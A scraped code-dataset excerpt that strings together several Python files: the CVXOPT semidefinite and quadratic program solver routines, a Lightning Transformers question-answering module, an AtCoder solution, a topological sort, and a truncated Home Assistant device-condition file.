misc.symm(zs[k], ms[k])
pcost = blas.dot(c,x)
dcost = -blas.dot(hl,zl) - misc.sdot2(hs, zs)
gap = blas.dot(sl, zl) + misc.sdot2(ss, zs)
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
# rx = c + G'*z
rx = matrix(c)
base.gemv(Gl, zl, rx, beta = 1.0, trans = 'T')
ind = 0
for k in range(len(ms)):
blas.scal(0.5, zs[k], inc = ms[k]+1)
for j in range(ms[k]):
blas.scal(0.0, zs[k], offset=j+ms[k]*(j+1), inc=ms[k])
base.gemv(Gs[k], zs[k], rx, alpha=2.0, beta=1.0, trans='T')
blas.scal(2.0, zs[k], inc=ms[k]+1)
ind += ms[k]
resx = blas.nrm2(rx) / resx0
# rz = G*x + s - h
rz = matrix(0.0, (ml + sum([msk**2 for msk in ms]), 1))
base.gemv(Gl, x, rz)
blas.axpy(sl, rz)
blas.axpy(hl, rz, alpha = -1.0)
ind = ml
for k in range(len(ms)):
base.gemv(Gs[k], x, rz, offsety = ind)
blas.axpy(ss[k], rz, offsety = ind, n = ms[k]**2)
blas.axpy(hs[k], rz, alpha = -1.0, offsety = ind,
n = ms[k]**2)
ind += ms[k]**2
resz = misc.snrm2(rz, dims) / resz0
pres, dres = resz, resx
s, z = matrix(0.0, (N,1)), matrix(0.0, (N,1))
blas.copy(sl, s)
blas.copy(zl, z)
ind = ml
for k in range(len(ms)):
blas.copy(ss[k], s, offsety = ind)
blas.copy(zs[k], z, offsety = ind)
ind += ms[k]
pslack = -misc.max_step(s, dims)
dslack = -misc.max_step(z, dims)
if status == 'optimal' or dcost <= 0.0:
pinfres = None
else:
# rx = G'*z
rx = matrix(0.0, (n,1))
base.gemv(Gl, zl, rx, beta = 1.0, trans = 'T')
ind = 0
for k in range(len(ms)):
blas.scal(0.5, zs[k], inc = ms[k]+1)
for j in range(ms[k]):
blas.scal(0.0, zs[k], offset=j+ms[k]*(j+1),
inc=ms[k])
base.gemv(Gs[k], zs[k], rx, alpha=2.0, beta=1.0,
trans='T')
blas.scal(2.0, zs[k], inc=ms[k]+1)
ind += ms[k]
pinfres = blas.nrm2(rx) / resx0 / dcost
if status == 'optimal' or pcost >= 0.0:
dinfres = None
else:
# rz = G*x + s
rz = matrix(0.0, (ml + sum([msk**2 for msk in ms]), 1))
base.gemv(Gl, x, rz)
blas.axpy(sl, rz)
ind = ml
for k in range(len(ms)):
base.gemv(Gs[k], x, rz, offsety = ind)
blas.axpy(ss[k], rz, offsety = ind, n = ms[k]**2)
ind += ms[k]**2
dims = {'l': ml, 's': ms, 'q': []}
dinfres = misc.snrm2(rz, dims) / resz0 / -pcost
return {'status': status, 'x': x, 'sl': sl, 'ss': ss, 'y': y,
'zl': zl, 'zs': zs, 'primal objective': pcost,
'dual objective': dcost, 'gap': gap, 'relative gap': relgap,
'primal infeasibility': pres, 'dual infeasibility': dres,
'residual as primal infeasibility certificate': pinfres,
'residual as dual infeasibility certificate': dinfres,
'primal slack': pslack, 'dual slack': dslack}
h = matrix(0.0, (N,1))
if isinstance(Gl,matrix) or [ Gk for Gk in Gs if isinstance(Gk,matrix) ]:
G = matrix(0.0, (N, n))
else:
G = spmatrix([], [], [], (N, n), 'd')
h[:ml] = hl
G[:ml,:] = Gl
ind = ml
for k in range(len(ms)):
m = ms[k]
h[ind : ind + m*m] = hs[k][:]
G[ind : ind + m*m, :] = Gs[k]
ind += m**2
if primalstart:
ps = {}
ps['x'] = primalstart['x']
ps['s'] = matrix(0.0, (N,1))
if ml: ps['s'][:ml] = primalstart['sl']
if ms:
ind = ml
for k in range(len(ms)):
m = ms[k]
ps['s'][ind : ind + m*m] = primalstart['ss'][k][:]
ind += m**2
else:
ps = None
if dualstart:
ds = {}
if p: ds['y'] = dualstart['y']
ds['z'] = matrix(0.0, (N,1))
if ml: ds['z'][:ml] = dualstart['zl']
if ms:
ind = ml
for k in range(len(ms)):
m = ms[k]
ds['z'][ind : ind + m*m] = dualstart['zs'][k][:]
ind += m**2
else:
ds = None
sol = conelp(c, G, h, dims, A = A, b = b, primalstart = ps, dualstart = ds, kktsolver = kktsolver, options = options)
if sol['s'] is None:
sol['sl'] = None
sol['ss'] = None
else:
sol['sl'] = sol['s'][:ml]
sol['ss'] = [ matrix(0.0, (mk, mk)) for mk in ms ]
ind = ml
for k in range(len(ms)):
m = ms[k]
sol['ss'][k][:] = sol['s'][ind:ind+m*m]
ind += m**2
del sol['s']
if sol['z'] is None:
sol['zl'] = None
sol['zs'] = None
else:
sol['zl'] = sol['z'][:ml]
sol['zs'] = [ matrix(0.0, (mk, mk)) for mk in ms ]
ind = ml
for k in range(len(ms)):
m = ms[k]
sol['zs'][k][:] = sol['z'][ind:ind+m*m]
ind += m**2
del sol['z']
return sol
def qp(P, q, G = None, h = None, A = None, b = None, solver = None,
    kktsolver = None, initvals = None, **kwargs):
    """
    Solves a quadratic program

        minimize    (1/2)*x'*P*x + q'*x
        subject to  G*x <= h
                    A*x = b.

    Input arguments.

        P is a n x n dense or sparse 'd' matrix with the lower triangular
        part of P stored in the lower triangle.  Must be positive
        semidefinite.

        q is an n x 1 dense 'd' matrix.

        G is an m x n dense or sparse 'd' matrix.

        h is an m x 1 dense 'd' matrix.

        A is a p x n dense or sparse 'd' matrix.

        b is a p x 1 dense 'd' matrix or None.

        solver is None or 'mosek'.

        The default values for G, h, A and b are empty matrices with
        zero rows.

    Output arguments (default solver).

        Returns a dictionary with keys 'status', 'x', 's', 'y', 'z',
        'primal objective', 'dual objective', 'gap', 'relative gap',
        'primal infeasibility', 'dual infeasibility', 'primal slack',
        'dual slack'.

        The 'status' field has values 'optimal' or 'unknown'.

        If the status is 'optimal', 'x', 's', 'y', 'z' are an approximate
        solution of the primal and dual optimality conditions

            G*x + s = h,  A*x = b
            P*x + G'*z + A'*y + q = 0
            s >= 0, z >= 0
            s'*z = 0.

        If the status is 'unknown', 'x', 's', 'y', 'z' are the last
        iterates before termination.  These satisfy s > 0 and z > 0, but
        are not necessarily feasible.

        The values of the other fields are defined as follows.

        - 'primal objective': the primal objective (1/2)*x'*P*x + q'*x.

        - 'dual objective': the dual objective

              L(x,y,z) = (1/2)*x'*P*x + q'*x + z'*(G*x - h) + y'*(A*x-b).

        - 'gap': the duality gap s'*z.

        - 'relative gap': the relative gap, defined as

              gap / -primal objective

          if the primal objective is negative,

              gap / dual objective

          if the dual objective is positive, and None otherwise.

        - 'primal infeasibility': the residual in the primal constraints,
          defined as the maximum of the residual in the inequalities

              || G*x + s - h || / max(1, ||h||)

          and the residual in the equalities

              || A*x - b || / max(1, ||b||).

        - 'dual infeasibility': the residual in the dual constraints,
          defined as

              || P*x + G'*z + A'*y + q || / max(1, ||q||).

        - 'primal slack': the smallest primal slack, min_k s_k.

        - 'dual slack': the smallest dual slack, min_k z_k.

        If the exit status is 'optimal', then the primal and dual
        infeasibilities are guaranteed to be less than
        solvers.options['feastol'] (default 1e-7).  The gap is less than
        solvers.options['abstol'] (default 1e-7) or the relative gap is
        less than solvers.options['reltol'] (default 1e-6).

        Termination with status 'unknown' indicates that the algorithm
        failed to find a solution that satisfies the specified tolerances.
        In some cases, the returned solution may be fairly accurate.  If
        the primal and dual infeasibilities, the gap, and the relative gap
        are small, then x, y, s, z are close to optimal.

    Output arguments (MOSEK solver).

        The return dictionary has two additional fields
        'residual as primal infeasibility certificate' and
        'residual as dual infeasibility certificate', and the 'status'
        field can also have the values 'primal infeasible' or
        'dual infeasible'.

        If the exit status is 'optimal', the different fields have the
        same meaning as for the default solver, but the magnitude of
        the residuals and duality gap is controlled by the MOSEK exit
        criteria.  The 'residual as primal infeasibility certificate' and
        'residual as dual infeasibility certificate' are None.

        Status 'primal infeasible'.

        - 'x', 's': None.

        - 'y', 'z' are an approximate certificate of infeasibility

              G'*z + A'*y = 0,  h'*z + b'*y = -1,  z >= 0.

        - 'primal objective': None.

        - 'dual objective': 1.0.

        - 'gap', 'relative gap': None.

        - 'primal infeasibility' and 'dual infeasibility': None.

        - 'primal slack': None.

        - 'dual slack': the smallest dual slack min z_k.

        - 'residual as primal infeasibility certificate': the residual in
          the condition of the infeasibility certificate, defined as

              || G'*z + A'*y || / max(1, ||c||).

        - 'residual as dual infeasibility certificate': None.

        Status 'dual infeasible'.

        - 'x', 's' are an approximate proof of dual infeasibility

              P*x = 0,  q'*x = -1,  G*x + s = 0,  A*x = 0,  s >= 0.

        - 'y', 'z': None.

        - 'primal objective': -1.0.

        - 'dual objective': None.

        - 'gap', 'relative gap': None.

        - 'primal infeasibility' and 'dual infeasibility': None.

        - 'primal slack': the smallest primal slack min_k s_k .

        - 'dual slack': None.

        - 'residual as primal infeasibility certificate': None.

        - 'residual as dual infeasibility certificate': the residual in
          the conditions of the infeasibility certificate, defined as
          the maximum of

              || P*x || / max(1, ||q||),
              || G*x + s || / max(1, ||h||),
              || A*x || / max(1, ||b||).

        If status is 'unknown', all the other fields are None.

    Control parameters.

        The control parameters for the different solvers can be modified
        by adding an entry to the dictionary cvxopt.solvers.options.  The
        following parameters control the execution of the default solver.

            options['show_progress'] True/False (default: True)
            options['maxiters'] positive integer (default: 100)
            options['refinement'] positive integer (default: 0)
            options['abstol'] scalar (default: 1e-7)
            options['reltol'] scalar (default: 1e-6)
            options['feastol'] scalar (default: 1e-7).

        The MOSEK parameters can be modified by adding an entry
        options['mosek'], containing a dictionary with MOSEK
        parameter/value pairs, as described in the MOSEK documentation.

        Options that are not recognized are replaced by their default
        values.
    """
    # Per-call options override the module-level defaults.
    options = kwargs.get('options',globals()['options'])

    from cvxopt import base, blas
    from cvxopt.base import matrix, spmatrix

    if solver == 'mosek':
        from cvxopt import misc
        try:
            from cvxopt import msk
            import mosek
        except ImportError: raise ValueError("invalid option "\
            "(solver='mosek'): cvxopt.msk is not installed")

        opts = options.get('mosek',None)
        if opts:
            solsta, x, z, y = msk.qp(P, q, G, h, A, b, options=opts)
        else:
            solsta, x, z, y = msk.qp(P, q, G, h, A, b)

        n = q.size[0]
        # Absent constraints are represented by empty (0-row) matrices so
        # the residual computations below work uniformly.
        if G is None: G = spmatrix([], [], [], (0,n), 'd')
        if h is None: h = matrix(0.0, (0,1))
        if A is None: A = spmatrix([], [], [], (0,n), 'd')
        if b is None: b = matrix(0.0, (0,1))
        m = G.size[0]

        # Normalization constants used in the relative residuals
        # (max(1, ||.||) guards against division by tiny norms).
        resx0 = max(1.0, blas.nrm2(q))
        resy0 = max(1.0, blas.nrm2(b))
        resz0 = max(1.0, blas.nrm2(h))

        # getattr: 'near_optimal' does not exist in every MOSEK version.
        if solsta in (mosek.solsta.optimal, getattr(mosek.solsta,'near_optimal',None)):
            if solsta is mosek.solsta.optimal: status = 'optimal'
            else: status = 'near optimal'
            # s = h - G*x (primal slack)
            s = matrix(h)
            base.gemv(G, x, s, alpha = -1.0, beta = 1.0)
            # rx = q + P*x + G'*z + A'*y
            # pcost = 0.5 * x'*P*x + q'*x
            rx = matrix(q)
            base.symv(P, x, rx, beta = 1.0)
            pcost = 0.5 * (blas.dot(x, rx) + blas.dot(x, q))
            base.gemv(A, y, rx, beta = 1.0, trans = 'T')
            base.gemv(G, z, rx, beta = 1.0, trans = 'T')
            resx = blas.nrm2(rx) / resx0
            # ry = A*x - b
            ry = matrix(b)
            base.gemv(A, x, ry, alpha = 1.0, beta = -1.0)
            resy = blas.nrm2(ry) / resy0
            # rz = G*x + s - h
            rz = matrix(0.0, (m,1))
            base.gemv(G, x, rz)
            blas.axpy(s, rz)
            blas.axpy(h, rz, alpha = -1.0)
            resz = blas.nrm2(rz) / resz0

            gap = blas.dot(s, z)
            dcost = pcost + blas.dot(y, ry) + blas.dot(z, rz) - gap
            if pcost < 0.0:
                relgap = gap / -pcost
            elif dcost > 0.0:
                relgap = gap / dcost
            else:
                relgap = None

            dims = {'l': m, 's': [], 'q': []}
            pslack = -misc.max_step(s, dims)
            dslack = -misc.max_step(z, dims)
            pres, dres = max(resy, resz), resx
            pinfres, dinfres = None, None

        elif solsta == mosek.solsta.prim_infeas_cer:
            status = 'primal infeasible'
            # Scale (y, z) so that h'*z + b'*y = -1 (infeasibility
            # certificate normalization).
            hz, by = blas.dot(h, z), blas.dot(b, y)
            blas.scal(1.0 / (-hz - by), y)
            blas.scal(1.0 / (-hz - by), z)
            # rx = -A'*y - G'*z
            rx = matrix(0.0, (q.size[0],1))
            base.gemv(A, y, rx, alpha = -1.0, trans = 'T')
            base.gemv(G, z, rx, alpha = -1.0, beta = 1.0, trans = 'T')
            pinfres = blas.nrm2(rx) / resx0
            dinfres = None
            x, s = None, None
            pres, dres = None, None
            pcost, dcost = None, 1.0
            gap, relgap = None, None
            dims = {'l': m, 's': [], 'q': []}
            dslack = -misc.max_step(z, dims)
            pslack = None

        elif solsta == mosek.solsta.dual_infeas_cer:
            status = 'dual infeasible'
            # Scale x so that q'*x = -1 (dual infeasibility certificate
            # normalization).
            qx = blas.dot(q,x)
            blas.scal(-1.0/qx, x)
            s = matrix(0.0, (m,1))
            base.gemv(G, x, s, alpha=-1.0)
            z, y = None, None
            # rx = P*x
            rx = matrix(0.0, (q.size[0],1))
            base.symv(P, x, rx, beta = 1.0)
            resx = blas.nrm2(rx) / resx0
            # ry = A*x
            ry = matrix(0.0, (b.size[0],1))
            base.gemv(A, x, ry)
            resy = blas.nrm2(ry) / resy0
            # rz = s + G*x
            rz = matrix(s)
            base.gemv(G, x, rz, beta = 1.0)
            resz = blas.nrm2(rz) / resz0
            pres, dres = None, None
            dinfres, pinfres = max(resx, resy, resz), None
            # NOTE(review): z and y were already set to None above; this
            # assignment is redundant but kept for byte-identical code.
            z, y = None, None
            pcost, dcost = -1.0, None
            gap, relgap = None, None
            dims = {'l': m, 's': [], 'q': []}
            pslack = -misc.max_step(s, dims)
            dslack = None

        else:
            status = 'unknown'
            x, s, y, z = None, None, None, None
            pcost, dcost = None, None
            gap, relgap = None, None
            pres, dres = None, None
            pslack, dslack = None, None
            pinfres, dinfres = None, None

        return {'status': status, 'x': x, 's': s, 'y': y, 'z': z,
            'primal objective': pcost, 'dual objective': dcost,
            'gap': gap, 'relative gap': relgap,
            'primal infeasibility': pres, 'dual infeasibility': dres,
            'primal slack': pslack, 'dual slack': dslack,
            'residual as primal infeasibility certificate': pinfres,
            'residual as dual infeasibility certificate': dinfres}

    # Default path: delegate to the native cone QP solver.
    return coneqp(P, q, G, h, None, A, b, initvals, kktsolver = kktsolver, options = options)
| 37.46099 | 121 | 0.490949 |
60499d1a9f22a82081bc4deae975fabf24aa9fc4 | 3,022 | py | Python | lightning_transformers/task/nlp/question_answering/model.py | yuvalkirstain/lightning-transformers | 7afa49ee9d298b947cf8f2a8f462f1a01fd3fe90 | [
"Apache-2.0"
] | null | null | null | lightning_transformers/task/nlp/question_answering/model.py | yuvalkirstain/lightning-transformers | 7afa49ee9d298b947cf8f2a8f462f1a01fd3fe90 | [
"Apache-2.0"
] | null | null | null | lightning_transformers/task/nlp/question_answering/model.py | yuvalkirstain/lightning-transformers | 7afa49ee9d298b947cf8f2a8f462f1a01fd3fe90 | [
"Apache-2.0"
] | null | null | null | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from typing import Any
import torch
from lightning_transformers.core.nlp import HFTransformer
from lightning_transformers.task.nlp.question_answering import QuestionAnsweringDataModule
from lightning_transformers.task.nlp.question_answering.datasets.squad.metric import SquadMetric
class QuestionAnsweringTransformer(HFTransformer):
    """``LightningModule`` implementing the Question Answering task.

    Args:
        *args: :class:`lightning_transformers.core.nlp.HFTransformer` arguments.
        downstream_model_type: Downstream HuggingFace AutoModel to load.
            (default ``transformers.AutoModelForQuestionAnswering``)
        **kwargs: :class:`lightning_transformers.core.nlp.HFTransformer` arguments.
    """

    def __init__(
        self, *args, downstream_model_type: str = "transformers.AutoModelForQuestionAnswering", cfg, **kwargs
    ) -> None:
        super().__init__(downstream_model_type, *args, **kwargs)
        self.cfg = cfg

    def training_step(self, batch: Any, batch_idx: int) -> torch.Tensor:
        # The HF model returns the loss as its first output element.
        loss = self.model(**batch)[0]
        self.log("train_loss", loss)
        return loss

    @property
    def hf_pipeline_task(self) -> str:
        """Name of the matching HuggingFace pipeline task."""
        return "question-answering"

    def validation_step(self, batch: Any, batch_idx: int, dataloader_idx: int = 0) -> None:
        # Remove the bookkeeping keys the model forward() does not accept.
        batch.pop("offset_mapping")
        ids = batch.pop("example_id")
        model_out = self.model(**batch)
        self.metric.update(ids, model_out.start_logits, model_out.end_logits)

    def on_validation_epoch_start(self) -> None:
        self.metric.reset()

    def on_validation_epoch_end(self) -> None:
        self.log_dict(self.metric.compute(), prog_bar=True)

    def configure_metrics(self, stage: str):
        # Bind the datamodule's post-processing to the concrete datasets so the
        # metric can map logits back to answer spans.
        dm: QuestionAnsweringDataModule = self.trainer.datamodule
        postprocess = partial(
            dm.postprocess_func,
            dataset=dm.ds,
            validation_dataset=dm.ds["validation"],
            original_validation_dataset=dm.ds["validation_original"],
        )
        self.metric = SquadMetric(
            postprocess_func=postprocess, example_id_strings=dm.example_id_strings
        )
c3d268973d6b4d276266467aa89c44e604ad9076 | 366 | py | Python | contests/atcoder/abc086/abc086_b/main.py | conao3/coder | 2cdb610fec013da88a3470d460108e8a9b462445 | [
"CC0-1.0"
] | null | null | null | contests/atcoder/abc086/abc086_b/main.py | conao3/coder | 2cdb610fec013da88a3470d460108e8a9b462445 | [
"CC0-1.0"
] | null | null | null | contests/atcoder/abc086/abc086_b/main.py | conao3/coder | 2cdb610fec013da88a3470d460108e8a9b462445 | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
# from typing import *
# def solve(a: int, b: int) -> str:
def solve(a: int, b: int) -> str:
    """Return "Yes" if concatenating ``a`` and ``b`` gives a square, else "No".

    AtCoder ABC086 B: the decimal representations of a and b are
    concatenated (e.g. a=1, b=21 -> 121) and the result is tested for
    being a perfect square.
    """
    import math  # local import keeps the template's top-of-file layout intact

    joined = int(str(a) + str(b))
    root = math.isqrt(joined)  # exact integer sqrt: no float precision issues
    return "Yes" if root * root == joined else "No"
# generated by online-judge-template-generator v4.1.0 (https://github.com/kmyk/online-judge-template-generator)
def main():
    """Read "a b" from stdin and print the answer."""
    tokens = input().split()
    a, b = (int(tok) for tok in tokens)
    print(solve(a, b))


if __name__ == '__main__':
    main()
29e288d81e88dfd0ca2106db44344b055913fea5 | 1,339 | py | Python | Python/Graph_Algorithms/Maximum_Shortest_Path/topological_sort.py | belikesayantan/DSA | 61ff334e88dca4279d473c698d30ef3fe2e2f98f | [
"MIT"
] | 1 | 2021-01-08T14:47:24.000Z | 2021-01-08T14:47:24.000Z | Python/Graph_Algorithms/Maximum_Shortest_Path/topological_sort.py | belikesayantan/DSA | 61ff334e88dca4279d473c698d30ef3fe2e2f98f | [
"MIT"
] | null | null | null | Python/Graph_Algorithms/Maximum_Shortest_Path/topological_sort.py | belikesayantan/DSA | 61ff334e88dca4279d473c698d30ef3fe2e2f98f | [
"MIT"
] | null | null | null | # Topological Sort Algorithm
from Graph_Algorithms.Graph import Graph, AdjacencySetGraph
from typing import List
from queue import Queue
def topological_sort(graph: Graph) -> List[int]:
"""
:param graph: Graph Data Structure
:return: list of nodes in topological sorted order.
"""
topological_sorted_list = list()
queue = Queue()
indegree = dict()
for v in range(graph.num_vertices):
indegree[v] = graph.get_indegree(v)
for v in range(graph.num_vertices):
if indegree[v] == 0:
queue.put(v)
while not queue.empty():
vertex_visited = queue.get()
topological_sorted_list.append(vertex_visited)
for neighbour in graph.get_adjacent_vertices(vertex_visited):
indegree[neighbour] -= 1
if indegree[neighbour] == 0:
queue.put(neighbour)
if len(topological_sorted_list) != graph.num_vertices:
raise ValueError("Graph contains a cycle !!")
return topological_sorted_list
if __name__ == '__main__':
    # Build a small directed DAG and print one valid topological order.
    g = AdjacencySetGraph(9, isdirected=True)
    edges = [(0, 1), (1, 2), (2, 7), (2, 4), (2, 3),
             (1, 5), (5, 6), (3, 6), (3, 4), (6, 8)]
    for src, dst in edges:
        g.add_edge(src, dst)
    print(topological_sort(g))
| 25.264151 | 69 | 0.640777 |
eed5c3f5896564824a860e70dd327e8d9459e731 | 8,218 | py | Python | homeassistant/components/binary_sensor/device_condition.py | RavensburgOP/core | 0ea76e848b182ca0ebb0fdb54558f7f733898ad7 | [
"Apache-2.0"
] | 11 | 2018-02-16T15:35:47.000Z | 2020-01-14T15:20:00.000Z | homeassistant/components/binary_sensor/device_condition.py | RavensburgOP/core | 0ea76e848b182ca0ebb0fdb54558f7f733898ad7 | [
"Apache-2.0"
] | 77 | 2020-07-16T16:43:09.000Z | 2022-03-31T06:14:37.000Z | homeassistant/components/binary_sensor/device_condition.py | Vaarlion/core | f3de8b9f28de01abf72c0f5bb0b457eb1841f201 | [
"Apache-2.0"
] | 6 | 2018-02-04T03:48:55.000Z | 2022-01-24T20:37:04.000Z | """Implement device conditions for binary sensor."""
from __future__ import annotations
import voluptuous as vol
from homeassistant.components.device_automation.const import CONF_IS_OFF, CONF_IS_ON
from homeassistant.const import CONF_ENTITY_ID, CONF_FOR, CONF_TYPE
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers import condition, config_validation as cv
from homeassistant.helpers.entity import get_device_class
from homeassistant.helpers.entity_registry import (
async_entries_for_device,
async_get_registry,
)
from homeassistant.helpers.typing import ConfigType
from . import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_BATTERY_CHARGING,
DEVICE_CLASS_COLD,
DEVICE_CLASS_CONNECTIVITY,
DEVICE_CLASS_DOOR,
DEVICE_CLASS_GARAGE_DOOR,
DEVICE_CLASS_GAS,
DEVICE_CLASS_HEAT,
DEVICE_CLASS_LIGHT,
DEVICE_CLASS_LOCK,
DEVICE_CLASS_MOISTURE,
DEVICE_CLASS_MOTION,
DEVICE_CLASS_MOVING,
DEVICE_CLASS_OCCUPANCY,
DEVICE_CLASS_OPENING,
DEVICE_CLASS_PLUG,
DEVICE_CLASS_POWER,
DEVICE_CLASS_PRESENCE,
DEVICE_CLASS_PROBLEM,
DEVICE_CLASS_SAFETY,
DEVICE_CLASS_SMOKE,
DEVICE_CLASS_SOUND,
DEVICE_CLASS_VIBRATION,
DEVICE_CLASS_WINDOW,
DOMAIN,
)
# Sentinel device class used when an entity declares no device class.
DEVICE_CLASS_NONE = "none"

# Condition type identifiers: one "is_<state>" / "is_not_<state>" (or
# "is_no_<state>") pair per binary sensor device class.
CONF_IS_BAT_LOW = "is_bat_low"
CONF_IS_NOT_BAT_LOW = "is_not_bat_low"
CONF_IS_CHARGING = "is_charging"
CONF_IS_NOT_CHARGING = "is_not_charging"
CONF_IS_COLD = "is_cold"
CONF_IS_NOT_COLD = "is_not_cold"
CONF_IS_CONNECTED = "is_connected"
CONF_IS_NOT_CONNECTED = "is_not_connected"
CONF_IS_GAS = "is_gas"
CONF_IS_NO_GAS = "is_no_gas"
CONF_IS_HOT = "is_hot"
CONF_IS_NOT_HOT = "is_not_hot"
CONF_IS_LIGHT = "is_light"
CONF_IS_NO_LIGHT = "is_no_light"
CONF_IS_LOCKED = "is_locked"
CONF_IS_NOT_LOCKED = "is_not_locked"
CONF_IS_MOIST = "is_moist"
CONF_IS_NOT_MOIST = "is_not_moist"
CONF_IS_MOTION = "is_motion"
CONF_IS_NO_MOTION = "is_no_motion"
CONF_IS_MOVING = "is_moving"
CONF_IS_NOT_MOVING = "is_not_moving"
CONF_IS_OCCUPIED = "is_occupied"
CONF_IS_NOT_OCCUPIED = "is_not_occupied"
CONF_IS_PLUGGED_IN = "is_plugged_in"
CONF_IS_NOT_PLUGGED_IN = "is_not_plugged_in"
CONF_IS_POWERED = "is_powered"
CONF_IS_NOT_POWERED = "is_not_powered"
CONF_IS_PRESENT = "is_present"
CONF_IS_NOT_PRESENT = "is_not_present"
CONF_IS_PROBLEM = "is_problem"
CONF_IS_NO_PROBLEM = "is_no_problem"
CONF_IS_UNSAFE = "is_unsafe"
CONF_IS_NOT_UNSAFE = "is_not_unsafe"
CONF_IS_SMOKE = "is_smoke"
CONF_IS_NO_SMOKE = "is_no_smoke"
CONF_IS_SOUND = "is_sound"
CONF_IS_NO_SOUND = "is_no_sound"
CONF_IS_VIBRATION = "is_vibration"
CONF_IS_NO_VIBRATION = "is_no_vibration"
CONF_IS_OPEN = "is_open"
CONF_IS_NOT_OPEN = "is_not_open"

# Condition types that map to the binary sensor being "on"
# (used by async_condition_from_config to pick the expected state).
IS_ON = [
    CONF_IS_BAT_LOW,
    CONF_IS_CHARGING,
    CONF_IS_COLD,
    CONF_IS_CONNECTED,
    CONF_IS_GAS,
    CONF_IS_HOT,
    CONF_IS_LIGHT,
    CONF_IS_NOT_LOCKED,
    CONF_IS_MOIST,
    CONF_IS_MOTION,
    CONF_IS_MOVING,
    CONF_IS_OCCUPIED,
    CONF_IS_OPEN,
    CONF_IS_PLUGGED_IN,
    CONF_IS_POWERED,
    CONF_IS_PRESENT,
    CONF_IS_PROBLEM,
    CONF_IS_SMOKE,
    CONF_IS_SOUND,
    CONF_IS_UNSAFE,
    CONF_IS_VIBRATION,
    CONF_IS_ON,
]

# Condition types that map to the binary sensor being "off".
IS_OFF = [
    CONF_IS_NOT_BAT_LOW,
    CONF_IS_NOT_CHARGING,
    CONF_IS_NOT_COLD,
    CONF_IS_NOT_CONNECTED,
    CONF_IS_NOT_HOT,
    CONF_IS_LOCKED,
    CONF_IS_NOT_MOIST,
    CONF_IS_NOT_MOVING,
    CONF_IS_NOT_OCCUPIED,
    CONF_IS_NOT_OPEN,
    CONF_IS_NOT_PLUGGED_IN,
    CONF_IS_NOT_POWERED,
    CONF_IS_NOT_PRESENT,
    CONF_IS_NOT_UNSAFE,
    CONF_IS_NO_GAS,
    CONF_IS_NO_LIGHT,
    CONF_IS_NO_MOTION,
    CONF_IS_NO_PROBLEM,
    CONF_IS_NO_SMOKE,
    CONF_IS_NO_SOUND,
    CONF_IS_NO_VIBRATION,
    CONF_IS_OFF,
]

# Maps a device class to the condition templates it offers; device classes
# not listed fall back to the DEVICE_CLASS_NONE entry (plain on/off).
ENTITY_CONDITIONS = {
    DEVICE_CLASS_BATTERY: [
        {CONF_TYPE: CONF_IS_BAT_LOW},
        {CONF_TYPE: CONF_IS_NOT_BAT_LOW},
    ],
    DEVICE_CLASS_BATTERY_CHARGING: [
        {CONF_TYPE: CONF_IS_CHARGING},
        {CONF_TYPE: CONF_IS_NOT_CHARGING},
    ],
    DEVICE_CLASS_COLD: [{CONF_TYPE: CONF_IS_COLD}, {CONF_TYPE: CONF_IS_NOT_COLD}],
    DEVICE_CLASS_CONNECTIVITY: [
        {CONF_TYPE: CONF_IS_CONNECTED},
        {CONF_TYPE: CONF_IS_NOT_CONNECTED},
    ],
    DEVICE_CLASS_DOOR: [{CONF_TYPE: CONF_IS_OPEN}, {CONF_TYPE: CONF_IS_NOT_OPEN}],
    DEVICE_CLASS_GARAGE_DOOR: [
        {CONF_TYPE: CONF_IS_OPEN},
        {CONF_TYPE: CONF_IS_NOT_OPEN},
    ],
    DEVICE_CLASS_GAS: [{CONF_TYPE: CONF_IS_GAS}, {CONF_TYPE: CONF_IS_NO_GAS}],
    DEVICE_CLASS_HEAT: [{CONF_TYPE: CONF_IS_HOT}, {CONF_TYPE: CONF_IS_NOT_HOT}],
    DEVICE_CLASS_LIGHT: [{CONF_TYPE: CONF_IS_LIGHT}, {CONF_TYPE: CONF_IS_NO_LIGHT}],
    DEVICE_CLASS_LOCK: [{CONF_TYPE: CONF_IS_LOCKED}, {CONF_TYPE: CONF_IS_NOT_LOCKED}],
    DEVICE_CLASS_MOISTURE: [{CONF_TYPE: CONF_IS_MOIST}, {CONF_TYPE: CONF_IS_NOT_MOIST}],
    DEVICE_CLASS_MOTION: [{CONF_TYPE: CONF_IS_MOTION}, {CONF_TYPE: CONF_IS_NO_MOTION}],
    DEVICE_CLASS_MOVING: [{CONF_TYPE: CONF_IS_MOVING}, {CONF_TYPE: CONF_IS_NOT_MOVING}],
    DEVICE_CLASS_OCCUPANCY: [
        {CONF_TYPE: CONF_IS_OCCUPIED},
        {CONF_TYPE: CONF_IS_NOT_OCCUPIED},
    ],
    DEVICE_CLASS_OPENING: [{CONF_TYPE: CONF_IS_OPEN}, {CONF_TYPE: CONF_IS_NOT_OPEN}],
    DEVICE_CLASS_PLUG: [
        {CONF_TYPE: CONF_IS_PLUGGED_IN},
        {CONF_TYPE: CONF_IS_NOT_PLUGGED_IN},
    ],
    DEVICE_CLASS_POWER: [
        {CONF_TYPE: CONF_IS_POWERED},
        {CONF_TYPE: CONF_IS_NOT_POWERED},
    ],
    DEVICE_CLASS_PRESENCE: [
        {CONF_TYPE: CONF_IS_PRESENT},
        {CONF_TYPE: CONF_IS_NOT_PRESENT},
    ],
    DEVICE_CLASS_PROBLEM: [
        {CONF_TYPE: CONF_IS_PROBLEM},
        {CONF_TYPE: CONF_IS_NO_PROBLEM},
    ],
    DEVICE_CLASS_SAFETY: [{CONF_TYPE: CONF_IS_UNSAFE}, {CONF_TYPE: CONF_IS_NOT_UNSAFE}],
    DEVICE_CLASS_SMOKE: [{CONF_TYPE: CONF_IS_SMOKE}, {CONF_TYPE: CONF_IS_NO_SMOKE}],
    DEVICE_CLASS_SOUND: [{CONF_TYPE: CONF_IS_SOUND}, {CONF_TYPE: CONF_IS_NO_SOUND}],
